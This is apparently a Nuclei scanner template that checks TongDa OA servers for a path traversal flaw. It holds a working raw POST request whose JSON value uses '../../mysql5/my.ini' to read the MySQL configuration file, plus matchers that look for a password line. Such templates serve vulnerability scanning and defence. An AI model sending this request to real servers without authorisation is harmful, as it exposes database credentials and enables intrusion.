id: oa-tongda-path-traversal

info:
  name: OA TongDa Path Traversal
  author: pikpikcu
  severity: critical
  reference:
    - https://github.com/jas502n/OA-tongda-RCE
  tags: tongda,lfi

requests:
  - raw:
      - |
        POST /ispirit/interface/gateway.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        json={"url":"/general/../../mysql5/my.ini"}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "text/html"
        part: header
        condition: and
      - type: word
        words:
          - "[mysql]"
          - "password="
        part: body
        condition: and
      - type: status
        status:
          - 200
